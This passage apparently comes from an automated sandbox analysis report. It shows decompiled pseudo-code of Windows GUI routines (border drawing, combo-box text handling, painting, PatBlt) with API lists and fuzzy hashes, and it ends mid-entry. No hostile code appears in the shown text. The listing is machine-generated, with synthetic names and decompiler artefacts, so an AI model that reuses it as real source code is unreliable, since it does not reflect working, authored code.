                                  								__eax = E0049B330(_v8, __eflags);
                                  								__eax =  *((intOrPtr*)(__eax + 0x40));
                                  								__edx = 0x13;
                                  								__eax = E0048A3D8(__eax, 0x13, __fp0);
                                  								__eax = _v8;
                                  								__eax = E0049B330(_v8, __eflags);
                                  								__eax =  *((intOrPtr*)(__eax + 0x40));
                                  								__edx = 0x13;
                                  								_v16 = __eax;
                                  								__eax = _v8;
                                  								__eax = E0049B330(_v8, __eflags);
                                  								__eax =  *((intOrPtr*)(__eax + 0x40));
                                  								__edx = 0xffffffce;
                                  								__eax = E0048A498(__eax, 0xffffffce, __fp0);
                                  								_v20 = __eax;
                                  								goto L10;
                                  							case 6:
                                  								__eax = _v8;
                                  								__eax = E0049B330(_v8, __eflags);
                                  								__eax =  *((intOrPtr*)(__eax + 0x40));
                                  								__edx = 0xffffffce;
                                  								__eax = E0048A498(__eax, 0xffffffce, __fp0);
                                  								__eax = _v8;
                                  								__eax = E0049B330(_v8, __eflags);
                                  								__eax =  *((intOrPtr*)(__eax + 0x40));
                                  								__edx = 0x13;
                                  								__eax = E0048A3D8(__eax, 0x13, __fp0);
                                  								__eax = _v8;
                                  								__eax = E0049B330(_v8, __eflags);
                                  								__eax =  *((intOrPtr*)(__eax + 0x40));
                                  								__edx = 0xffffffce;
                                  								_v16 = __eax;
                                  								__eax = _v8;
                                  								__eax = E0049B330(_v8, __eflags);
                                  								__eax =  *((intOrPtr*)(__eax + 0x40));
                                  								__edx = 0x13;
                                  								__eax = E0048A3D8(__eax, 0x13, __fp0);
                                  								_v20 = __eax;
                                  								goto L10;
                                  						}
                                  					}
                                  					L10:
                                  					GetClientRect(E0044D590(_v8),  &_v37);
                                  					GetWindowRect(E0044D590(_v8),  &_v53);
                                  					MapWindowPoints(0, E0044D590(_v8),  &_v53, 2);
                                  					OffsetRect( &_v37,  ~(_v53.left),  ~(_v53.top));
                                  					ExcludeClipRect(_t531, _v37, _v37.top, _v37.right, _v37.bottom);
                                  					OffsetRect( &_v53,  ~(_v53.left),  ~(_v53.top));
                                  					_v12 = E004294DC( *((intOrPtr*)(_v8 + 0x21c)));
                                  					_push(_t537);
                                  					_push(0x49b2fb);
                                  					_push( *[fs:eax]);
                                  					 *[fs:eax] = _t540;
                                  					E0042955C( *((intOrPtr*)(_v8 + 0x21c)), _t531);
                                  					E00428A88( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x21c)) + 0x10)), _t464, 1, _t531, _t537);
                                  					if(( *(_v8 + 0x208) & 0x00000002) != 0 || ( *(_v8 + 0x208) & 0x00000001) != 0 && ( *((intOrPtr*)(_v8 + 0x20a)) - 0xffffffffffffffff < 0 ||  *((char*)(_v8 + 0x20a)) == 0 &&  *((intOrPtr*)(_v8 + 0x209)) - 0xffffffffffffffff < 0)) {
                                  						E0042897C( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x21c)) + 0x10)), _t464, _v16, _t531, _t537);
                                  						if(( *(_v8 + 0x208) & 0x00000002) != 0) {
                                  							E004290E0( *((intOrPtr*)(_v8 + 0x21c)), _v53.top, _v53.right);
                                  							_t464 = _v53.top;
                                  							E00429080( *((intOrPtr*)(_v8 + 0x21c)), _v53.top, _v53.left - 1);
                                  						}
                                  						if(( *(_v8 + 0x208) & 0x00000001) != 0) {
                                  							E004290E0( *((intOrPtr*)(_v8 + 0x21c)), _v53.top, _v53.left);
                                  							_t464 = _v53.bottom;
                                  							E00429080( *((intOrPtr*)(_v8 + 0x21c)), _v53.bottom, _v53.left);
                                  						}
                                  					}
                                  					if(( *(_v8 + 0x208) & 0x00000002) != 0 || ( *(_v8 + 0x208) & 0x00000001) != 0 &&  *((intOrPtr*)(_v8 + 0x20a)) - 0xffffffffffffffff < 0 &&  *((intOrPtr*)(_v8 + 0x209)) - 0xffffffffffffffff < 0) {
                                  						E0042897C( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x21c)) + 0x10)), _t464, _t459, _t531, _t537);
                                  						if(( *(_v8 + 0x208) & 0x00000002) != 0) {
                                  							E004290E0( *((intOrPtr*)(_v8 + 0x21c)), _v53.top + 1, _v53.right - 1);
                                  							_t464 = _v53.top + 1;
                                  							E00429080( *((intOrPtr*)(_v8 + 0x21c)), _v53.top + 1, _v53.left + 1);
                                  						}
                                  						if(( *(_v8 + 0x208) & 0x00000001) != 0) {
                                  							E004290E0( *((intOrPtr*)(_v8 + 0x21c)), _v53.top + 1, _v53.left + 1);
                                  							_t464 = _v53.bottom - 2;
                                  							E00429080( *((intOrPtr*)(_v8 + 0x21c)), _v53.bottom - 2, _v53.left + 1);
                                  						}
                                  					}
                                  					if(( *(_v8 + 0x208) & 0x00000008) != 0 || ( *(_v8 + 0x208) & 0x00000004) != 0 && ( *((intOrPtr*)(_v8 + 0x20a)) - 0xffffffffffffffff < 0 ||  *((char*)(_v8 + 0x20a)) == 0 &&  *((intOrPtr*)(_v8 + 0x209)) - 0xffffffffffffffff < 0)) {
                                  						E0042897C( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x21c)) + 0x10)), _t464, _v20, _t531, _t537);
                                  						if(( *(_v8 + 0x208) & 0x00000004) != 0) {
                                  							E004290E0( *((intOrPtr*)(_v8 + 0x21c)), _v53.top, _v53.right - 1);
                                  							_t464 = _v53.bottom - 1;
                                  							E00429080( *((intOrPtr*)(_v8 + 0x21c)), _v53.bottom - 1, _v53.right - 1);
                                  						}
                                  						if(( *(_v8 + 0x208) & 0x00000008) != 0) {
                                  							E004290E0( *((intOrPtr*)(_v8 + 0x21c)), _v53.bottom - 1, _v53.right - 1);
                                  							_t464 = _v53.bottom - 1;
                                  							E00429080( *((intOrPtr*)(_v8 + 0x21c)), _v53.bottom - 1, _v53.left - 1);
                                  						}
                                  					}
                                  					if(( *(_v8 + 0x208) & 0x00000008) != 0 || ( *(_v8 + 0x208) & 0x00000004) != 0 &&  *((intOrPtr*)(_v8 + 0x20a)) - 0xffffffffffffffff < 0 &&  *((intOrPtr*)(_v8 + 0x209)) - 0xffffffffffffffff < 0) {
                                  						E0042897C( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x21c)) + 0x10)), _t464, _t535, _t531, _t537);
                                  						if(( *(_v8 + 0x208) & 0x00000004) != 0) {
                                  							E004290E0( *((intOrPtr*)(_v8 + 0x21c)), _v53.top + 1, _v53.right - 2);
                                  							E00429080( *((intOrPtr*)(_v8 + 0x21c)), _v53.bottom - 2, _v53.right - 2);
                                  						}
                                  						if(( *(_v8 + 0x208) & 0x00000008) != 0) {
                                  							E004290E0( *((intOrPtr*)(_v8 + 0x21c)), _v53.bottom - 2, _v53.right - 2);
                                  							E00429080( *((intOrPtr*)(_v8 + 0x21c)), _v53.bottom - 2, _v53.left);
                                  						}
                                  					}
                                  					_pop(_t498);
                                  					 *[fs:eax] = _t498;
                                  					_push(0x49b302);
                                  					return E0042955C( *((intOrPtr*)(_v8 + 0x21c)), _v12);
                                  				}
                                  			}

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: Rect$OffsetWindow$ClientClipExcludePoints
                                  • String ID:
                                  • API String ID: 435961686-0
                                  • Opcode ID: 8c2f7243cc17b1b8e22b356c4a933540b5c2df9e233d963e7aeee3dc8bfce65e
                                  • Instruction ID: d5b216787b4852c36f96583f63d30f291f93d0f5b71de8b966ee4ce4873c2356
                                  • Opcode Fuzzy Hash: 8c2f7243cc17b1b8e22b356c4a933540b5c2df9e233d963e7aeee3dc8bfce65e
                                  • Instruction Fuzzy Hash: 3E22EB34B042089FCB10EBA9D585EDEBBF1EF48304F6541E6E855AB362D734AE02DB54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 87%
                                  			E0043B458(intOrPtr __eax, void* __ebx, signed int* __edx, void* __edi, void* __esi) {
                                  				intOrPtr _v8;
                                  				signed int _v12;
                                  				char _v16;
                                  				char _v20;
                                  				char _v24;
                                  				void* _v44;
                                  				struct tagMSG _v52;
                                  				char _v56;
                                  				char _v60;
                                  				char _v64;
                                  				char _v68;
                                  				char _v72;
                                  				char _v76;
                                  				intOrPtr _v80;
                                  				intOrPtr _v84;
                                  				char _v88;
                                  				char _v92;
                                  				long _t115;
                                  				void* _t119;
                                  				intOrPtr _t122;
                                  				void* _t130;
                                  				void* _t133;
                                  				void* _t139;
                                  				signed int _t148;
                                  				void* _t152;
                                  				long _t167;
                                  				void* _t177;
                                  				intOrPtr _t178;
                                  				signed int _t180;
                                  				intOrPtr _t184;
                                  				signed int _t186;
                                  				signed int _t195;
                                  				int _t199;
                                  				signed int _t205;
                                  				signed int _t220;
                                  				signed int* _t232;
                                  				void* _t233;
                                  				intOrPtr _t251;
                                  				intOrPtr _t256;
                                  				void* _t284;
                                  				signed int _t293;
                                  				intOrPtr _t295;
                                  				intOrPtr _t296;
                                  
                                  				_t291 = __esi;
                                  				_t288 = __edi;
                                  				_t295 = _t296;
                                  				_t233 = 0xb;
                                  				do {
                                  					_push(0);
                                  					_push(0);
                                  					_t233 = _t233 - 1;
                                  				} while (_t233 != 0);
                                  				_push(__ebx);
                                  				_push(__esi);
                                  				_push(__edi);
                                  				_t232 = __edx;
                                  				_v8 = __eax;
                                  				_push(_t295);
                                  				_push(0x43b810);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t296;
                                  				E0044C574(_v8, __edx);
                                  				if( *((char*)(_v8 + 0x268)) == 0) {
                                  					L40:
                                  					_pop(_t251);
                                  					 *[fs:eax] = _t251;
                                  					_push(0x43b817);
                                  					E004043FC( &_v92, 5);
                                  					E004043D8( &_v72);
                                  					E004043FC( &_v68, 2);
                                  					E004043FC( &_v60, 2);
                                  					return E004043FC( &_v24, 2);
                                  				} else {
                                  					if( *((intOrPtr*)(_v8 + 0x276)) - 2 >= 0) {
                                  						_t115 = GetTickCount();
                                  						_t256 = _v8;
                                  						__eflags = _t115 -  *((intOrPtr*)(_t256 + 0x26c)) - 0x1f4;
                                  						if(_t115 -  *((intOrPtr*)(_t256 + 0x26c)) >= 0x1f4) {
                                  							__eflags = _v8 + 0x270;
                                  							E004043D8(_v8 + 0x270);
                                  						}
                                  						 *((intOrPtr*)(_v8 + 0x26c)) = GetTickCount();
                                  					} else {
                                  						E00446D44(_v8,  &_v56);
                                  						E0040442C(_v8 + 0x270, _v56);
                                  					}
                                  					_t119 =  *_t232 - 8;
                                  					if(_t119 == 0) {
                                  						__eflags = E0043B364( &_v12,  &_v16, _t295);
                                  						if(__eflags == 0) {
                                  							_t122 = _v8;
                                  							__eflags =  *((intOrPtr*)(_t122 + 0x276)) - 2;
                                  							if( *((intOrPtr*)(_t122 + 0x276)) - 2 >= 0) {
                                  								while(1) {
                                  									L24:
                                  									_t130 = E0040D4D0( *(_v8 + 0x270), E00404698( *(_v8 + 0x270)));
                                  									__eflags = _t130 - 2;
                                  									if(_t130 != 2) {
                                  										break;
                                  									}
                                  									_t133 = E00404698( *(_v8 + 0x270));
                                  									__eflags = _v8 + 0x270;
                                  									E00404938(_v8 + 0x270, 1, _t133);
                                  								}
                                  								_t139 = E00404698( *(_v8 + 0x270));
                                  								__eflags = _v8 + 0x270;
                                  								E00404938(_v8 + 0x270, 1, _t139);
                                  								L26:
                                  								 *_t232 = 0;
                                  								E00403814(_v8, __eflags);
                                  								goto L40;
                                  							}
                                  							E00446D44(_v8,  &_v60);
                                  							_t148 = E00404698(_v60);
                                  							__eflags = _t148;
                                  							if(_t148 <= 0) {
                                  								goto L24;
                                  							}
                                  							E00446D44(_v8,  &_v24);
                                  							_t293 = _v12;
                                  							while(1) {
                                  								_t152 = E0040D4D0(_v24, _t293);
                                  								__eflags = _t152 - 2;
                                  								if(_t152 != 2) {
                                  									break;
                                  								}
                                  								_t293 = _t293 - 1;
                                  								__eflags = _t293;
                                  							}
                                  							E004048F8(_v24, _t293 - 1, 1,  &_v20);
                                  							SendMessageA(E0044D590(_v8), 0x14e, 0xffffffff, 0);
                                  							E004048F8(_v24, 0x7fffffff, _v16 + 1,  &_v68);
                                  							E004046E4( &_v64, _v68, _v20);
                                  							E00446D74(_v8, _t232, _v64, _t293);
                                  							_t167 = E004075BC();
                                  							SendMessageA(E0044D590(_v8), 0x142, 0, _t167);
                                  							E00446D44(_v8,  &_v72);
                                  							E0040442C(_v8 + 0x270, _v72);
                                  							goto L26;
                                  						}
                                  						E0043B390(_t232, _t291, __eflags, _t295);
                                  						goto L26;
                                  					} else {
                                  						_t177 = _t119 - 1;
                                  						if(_t177 == 0) {
                                  							_t178 = _v8;
                                  							__eflags =  *((char*)(_t178 + 0x269));
                                  							if( *((char*)(_t178 + 0x269)) != 0) {
                                  								_t180 = E0043A38C(_v8);
                                  								__eflags = _t180;
                                  								if(_t180 != 0) {
                                  									E0043A3B0(_v8, 0);
                                  								}
                                  							}
                                  						} else {
                                  							if(_t177 != 0x12) {
                                  								_t184 = _v8;
                                  								__eflags =  *((char*)(_t184 + 0x269));
                                  								if( *((char*)(_t184 + 0x269)) != 0) {
                                  									_t220 = E0043A38C(_v8);
                                  									__eflags = _t220;
                                  									if(_t220 == 0) {
                                  										E0043A3B0(_v8, 1);
                                  									}
                                  								}
                                  								_t186 = E0043B364( &_v12,  &_v16, _t295);
                                  								__eflags = _t186;
                                  								if(_t186 == 0) {
                                  									E004045C0();
                                  									E004046E4( &_v24, _v84,  *(_v8 + 0x270));
                                  								} else {
                                  									E004048F8( *(_v8 + 0x270), _v12, 1,  &_v76);
                                  									_push(_v76);
                                  									E004045C0();
                                  									_pop(_t284);
                                  									E004046E4( &_v24, _v80, _t284);
                                  								}
                                  								__eflags =  *_t232 & 0x000000ff;
                                  								asm("bt [edx], eax");
                                  								if(( *_t232 & 0x000000ff) >= 0) {
                                  									_t195 = E0043B820(_v8, _t232, _v24, _t288, _t291);
                                  									__eflags = _t195;
                                  									if(_t195 != 0) {
                                  										 *_t232 = 0;
                                  									}
                                  								} else {
                                  									_t199 = PeekMessageA( &_v52, E0044D590(_v8), 0, 0, 0);
                                  									__eflags = _t199;
                                  									if(_t199 != 0) {
                                  										__eflags = _v52.message - 0x102;
                                  										if(_v52.message == 0x102) {
                                  											E004045C0();
                                  											E004046E4( &_v88, _v92, _v24);
                                  											_t205 = E0043B820(_v8, _t232, _v88, _t288, _t291);
                                  											__eflags = _t205;
                                  											if(_t205 != 0) {
                                  												PeekMessageA( &_v52, E0044D590(_v8), 0, 0, 1);
                                  												 *_t232 = 0;
                                  											}
                                  										}
                                  									}
                                  								}
                                  							}
                                  						}
                                  						goto L40;
                                  					}
                                  				}
                                  			}

                                  APIs
                                  • GetTickCount.KERNEL32 ref: 0043B4C1
                                  • GetTickCount.KERNEL32 ref: 0043B4E3
                                    • Part of subcall function 0043B364: SendMessageA.USER32 ref: 0043B380
                                  • SendMessageA.USER32 ref: 0043B5C5
                                  • SendMessageA.USER32 ref: 0043B615
                                    • Part of subcall function 0043B390: SendMessageA.USER32 ref: 0043B3D1
                                    • Part of subcall function 0043B390: SendMessageA.USER32 ref: 0043B3FD
                                    • Part of subcall function 0043B390: SendMessageA.USER32 ref: 0043B431
                                  • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 0043B75D
                                  • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 0043B7AA
                                    • Part of subcall function 0043A38C: SendMessageA.USER32 ref: 0043A3A0
                                    • Part of subcall function 0043A3B0: SendMessageA.USER32 ref: 0043A3CD
                                    • Part of subcall function 0043A3B0: InvalidateRect.USER32(00000000,000000FF,000000FF), ref: 0043A3EA
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: Message$Send$CountPeekTick$InvalidateRect
                                  • String ID:
                                  • API String ID: 2065907832-0
                                  • Opcode ID: db388b5323bf4f57661620b637374c898872ee8102304ca0f6d703f0bdadae47
                                  • Instruction ID: d127a3ff5eb7745ad22c338c3887c7f9bc26e366bcf883f0e0a0d6bea00676aa
                                  • Opcode Fuzzy Hash: db388b5323bf4f57661620b637374c898872ee8102304ca0f6d703f0bdadae47
                                  • Instruction Fuzzy Hash: 75B16270A04108EBDF10EBA5C986BDDB3B5EF49308F2454B6E500BB392D738AE05DB59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 89%
                                  			E00460EE0(intOrPtr* __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
                                  				intOrPtr* _v8;
                                  				intOrPtr* _v12;
                                  				struct HDC__* _v16;
                                  				struct tagPAINTSTRUCT _v80;
                                  				struct tagRECT _v96;
                                  				struct tagRECT _v112;
                                  				signed int _v116;
                                  				long _v120;
                                  				void* __ebp;
                                  				void* _t68;
                                  				void* _t94;
                                  				struct HBRUSH__* _t97;
                                  				intOrPtr _t105;
                                  				void* _t118;
                                  				void* _t127;
                                  				intOrPtr _t140;
                                  				intOrPtr _t146;
                                  				void* _t147;
                                  				void* _t148;
                                  				void* _t150;
                                  				void* _t152;
                                  				intOrPtr _t153;
                                  
                                  				_t148 = __esi;
                                  				_t147 = __edi;
                                  				_t138 = __edx;
                                  				_t127 = __ebx;
                                  				_t150 = _t152;
                                  				_t153 = _t152 + 0xffffff8c;
                                  				_v12 = __edx;
                                  				_v8 = __eax;
                                  				_t68 =  *_v12 - 0xf;
                                  				if(_t68 == 0) {
                                  					_v16 =  *(_v12 + 4);
                                  					if(_v16 == 0) {
                                  						 *(_v12 + 4) = BeginPaint( *(_v8 + 0x254),  &_v80);
                                  					}
                                  					_push(_t150);
                                  					_push(0x4610ae);
                                  					_push( *[fs:eax]);
                                  					 *[fs:eax] = _t153;
                                  					if(_v16 == 0) {
                                  						GetWindowRect( *(_v8 + 0x254),  &_v96);
                                  						E00446888(_v8,  &_v120,  &_v96);
                                  						_v96.left = _v120;
                                  						_v96.top = _v116;
                                  						E00445658( *(_v12 + 4),  ~(_v96.top),  ~(_v96.left));
                                  					}
                                  					E0044B244(_v8, _t127, _v12, _t147, _t148);
                                  					_pop(_t140);
                                  					 *[fs:eax] = _t140;
                                  					_push(0x4610bc);
                                  					if(_v16 == 0) {
                                  						return EndPaint( *(_v8 + 0x254),  &_v80);
                                  					}
                                  					return 0;
                                  				} else {
                                  					_t94 = _t68 - 5;
                                  					if(_t94 == 0) {
                                  						_t97 = E00428C98( *((intOrPtr*)(_v8 + 0x170)));
                                  						 *((intOrPtr*)( *_v8 + 0x44))();
                                  						FillRect( *(_v12 + 4),  &_v112, _t97);
                                  						if( *((char*)(_v8 + 0x22f)) == 2 &&  *(_v8 + 0x254) != 0) {
                                  							GetClientRect( *(_v8 + 0x254),  &_v96);
                                  							FillRect( *(_v12 + 4),  &_v96, E00428C98( *((intOrPtr*)(_v8 + 0x170))));
                                  						}
                                  						_t105 = _v12;
                                  						 *((intOrPtr*)(_t105 + 0xc)) = 1;
                                  					} else {
                                  						_t118 = _t94 - 0x2b;
                                  						if(_t118 == 0) {
                                  							E00460E54(_t150);
                                  							_t105 = _v8;
                                  							if( *((char*)(_t105 + 0x22f)) == 2) {
                                  								if(E0046137C(_v8) == 0 || E00460EA0(_t138, _t150) == 0) {
                                  									_t146 = 1;
                                  								} else {
                                  									_t146 = 0;
                                  								}
                                  								_t105 = E0045E168( *(_v8 + 0x254), _t146);
                                  							}
                                  						} else {
                                  							if(_t118 != 0x45) {
                                  								_t105 = E00460E54(_t150);
                                  							} else {
                                  								E00460E54(_t150);
                                  								_t105 = _v12;
                                  								if( *((intOrPtr*)(_t105 + 0xc)) == 1) {
                                  									_t105 = _v12;
                                  									 *((intOrPtr*)(_t105 + 0xc)) = 0xffffffff;
                                  								}
                                  							}
                                  						}
                                  					}
                                  					return _t105;
                                  				}
                                  			}

                                  APIs
                                  • FillRect.USER32(?,?), ref: 00460F59
                                  • GetClientRect.USER32 ref: 00460F84
                                  • FillRect.USER32(?,?,00000000), ref: 00460FA3
                                    • Part of subcall function 00460E54: CallWindowProcA.USER32(?,?,?,?,?), ref: 00460E8E
                                  • BeginPaint.USER32(?,?), ref: 0046101B
                                  • GetWindowRect.USER32 ref: 00461048
                                  • EndPaint.USER32(?,?), ref: 004610A8
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: Rect$FillPaintWindow$BeginCallClientProc
                                  • String ID:
                                  • API String ID: 901200654-0
                                  • Opcode ID: daa94e52ecbd2a872ef6d1a8278fdbad5f14159e53a9ff2b2f1c986726e241d7
                                  • Instruction ID: 27c55b74c290ca9de160857cf78199b3a46fbd1b5bcb37aa3b833d0e0a1a7686
                                  • Opcode Fuzzy Hash: daa94e52ecbd2a872ef6d1a8278fdbad5f14159e53a9ff2b2f1c986726e241d7
                                  • Instruction Fuzzy Hash: 9B511E74D04248EFCB14DBA9C589E9EB7F4AF08314F1481AAF408E7751D739AE45CB19
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0049CCC8(void* __eax, void* __ecx, void* __edi, void* __eflags) {
                                  				void* _t26;
                                  				void* _t31;
                                  				int _t37;
                                  				int _t40;
                                  				void* _t44;
                                  				void* _t49;
                                  				int _t56;
                                  				void* _t60;
                                  				void* _t65;
                                  
                                  				_t60 = __eax;
                                  				E00428D80( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x160)) + 0x14)), __ecx, 0, __edi, _t65, __eflags);
                                  				E0042897C( *((intOrPtr*)( *((intOrPtr*)(_t60 + 0x160)) + 0x10)), __ecx,  *((intOrPtr*)(E0049B330(E0049CF70(_t60), __eflags) + 0x70)), __edi, _t65);
                                  				_t26 =  *((intOrPtr*)(E0049CF70(_t60) + 0x227)) - 2;
                                  				if(_t26 >= 0) {
                                  					_t44 = _t26 - 2;
                                  					if(_t44 < 0) {
                                  						PatBlt(E004294DC( *((intOrPtr*)(_t60 + 0x160))), 0, 0, 2, 6, 0x5a0049);
                                  						_t49 = E00446748(_t60);
                                  						PatBlt(E004294DC( *((intOrPtr*)(_t60 + 0x160))), 2, 2, _t49 - 6, 2, 0x5a0049);
                                  						_t56 = E00446748(_t60) - 4;
                                  						__eflags = _t56;
                                  						return PatBlt(E004294DC( *((intOrPtr*)(_t60 + 0x160))), _t56, 0, 2, 6, 0x5a0049);
                                  					}
                                  					return _t44;
                                  				}
                                  				PatBlt(E004294DC( *((intOrPtr*)(_t60 + 0x160))), 0, 0, 6, 2, 0x5a0049);
                                  				_t31 = E0044678C(_t60);
                                  				PatBlt(E004294DC( *((intOrPtr*)(_t60 + 0x160))), 2, 2, 2, _t31 - 4, 0x5a0049);
                                  				_t37 = E0044678C(_t60);
                                  				_t40 = E0044678C(_t60) - 2;
                                  				__eflags = _t40;
                                  				return PatBlt(E004294DC( *((intOrPtr*)(_t60 + 0x160))), 0, _t40, 6, _t37, 0x5a0049);
                                  			}

                                  APIs
                                  • PatBlt.GDI32(00000000,00000000,00000000,00000006,00000002,005A0049), ref: 0049CD2B
                                  • PatBlt.GDI32(00000000,00000002,00000002,00000002,-00000004,005A0049), ref: 0049CD52
                                  • PatBlt.GDI32(00000000,00000000,-00000002,00000006,00000000,005A0049), ref: 0049CD7F
                                  • PatBlt.GDI32(00000000,00000000,00000000,00000002,00000006,005A0049), ref: 0049CD9F
                                  • PatBlt.GDI32(00000000,00000002,00000002,-00000006,00000002,005A0049), ref: 0049CDC6
                                  • PatBlt.GDI32(00000000,-00000004,00000000,00000002,00000006,005A0049), ref: 0049CDED
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5383e84f9b8d3d2b900de6305c8fa764a65810f25d42724baedf77359a2c569c
                                  • Instruction ID: 94e61b4787a8b36ce3a46e24696fbe29ce099cad82eed1c8396a8660375b19cd
                                  • Opcode Fuzzy Hash: 5383e84f9b8d3d2b900de6305c8fa764a65810f25d42724baedf77359a2c569c
                                  • Instruction Fuzzy Hash: 5E213E647943007BEA10BB7ADC8BF5B1A496B05B08F85547ABA05FF1D7C9BEDC014268
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 81%
                                  			E0042A328(intOrPtr* __eax, void* __ebx, signed int __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags, signed int* _a4, signed int* _a8) {
                                  				intOrPtr* _v8;
                                  				intOrPtr _v12;
                                  				signed int _v16;
                                  				intOrPtr _v20;
                                  				signed int _v24;
                                  				signed int _v32;
                                  				struct HDC__* _v44;
                                  				signed int* _t36;
                                  				signed int _t39;
                                  				signed int _t42;
                                  				signed int* _t52;
                                  				signed int _t56;
                                  				intOrPtr _t66;
                                  				void* _t72;
                                  				void* _t73;
                                  				void* _t74;
                                  				intOrPtr _t75;
                                  
                                  				_t73 = _t74;
                                  				_t75 = _t74 + 0xffffff8c;
                                  				_v16 = __ecx;
                                  				_v12 = __edx;
                                  				_v8 = __eax;
                                  				_t52 = _a8;
                                  				_v24 = _v16 << 4;
                                  				_v20 = E004087C4(_v24, __ecx, __edx, __eflags);
                                  				 *[fs:edx] = _t75;
                                  				_t56 = _v24;
                                  				 *((intOrPtr*)( *_v8 + 0xc))( *[fs:edx], 0x42a62a, _t73, __edi, __esi, __ebx, _t72);
                                  				if(( *_t52 | _t52[1]) != 0) {
                                  					_t36 = _a4;
                                  					 *_t36 =  *_t52;
                                  					_t36[1] = _t52[1];
                                  				} else {
                                  					 *_a4 = GetSystemMetrics(0xb);
                                  					_a4[1] = GetSystemMetrics(0xc);
                                  				}
                                  				_v44 = GetDC(0);
                                  				if(_v44 == 0) {
                                  					E004297D8(_t56);
                                  				}
                                  				_push(_t73);
                                  				_push(0x42a411);
                                  				_push( *[fs:edx]);
                                  				 *[fs:edx] = _t75;
                                  				_t39 = GetDeviceCaps(_v44, 0xe);
                                  				_t42 = _t39 * GetDeviceCaps(_v44, 0xc);
                                  				if(_t42 <= 8) {
                                  					__eflags = 1;
                                  					_v32 = 1 << _t42;
                                  				} else {
                                  					_v32 = 0x7fffffff;
                                  				}
                                  				_pop(_t66);
                                  				 *[fs:eax] = _t66;
                                  				_push(0x42a418);
                                  				return ReleaseDC(0, _v44);
                                  			}

                                  APIs
                                  • GetSystemMetrics.USER32 ref: 0042A376
                                  • GetSystemMetrics.USER32 ref: 0042A382
                                  • GetDC.USER32(00000000), ref: 0042A39E
                                  • GetDeviceCaps.GDI32(00000000,0000000E), ref: 0042A3C5
                                  • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0042A3D2
                                  • ReleaseDC.USER32(00000000,00000000), ref: 0042A40B
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: CapsDeviceMetricsSystem$Release
                                  • String ID:
                                  • API String ID: 447804332-0
                                  • Opcode ID: e77851f6ed4db6b595f3bdff75b5207152b3204487869f168d846c86834e3117
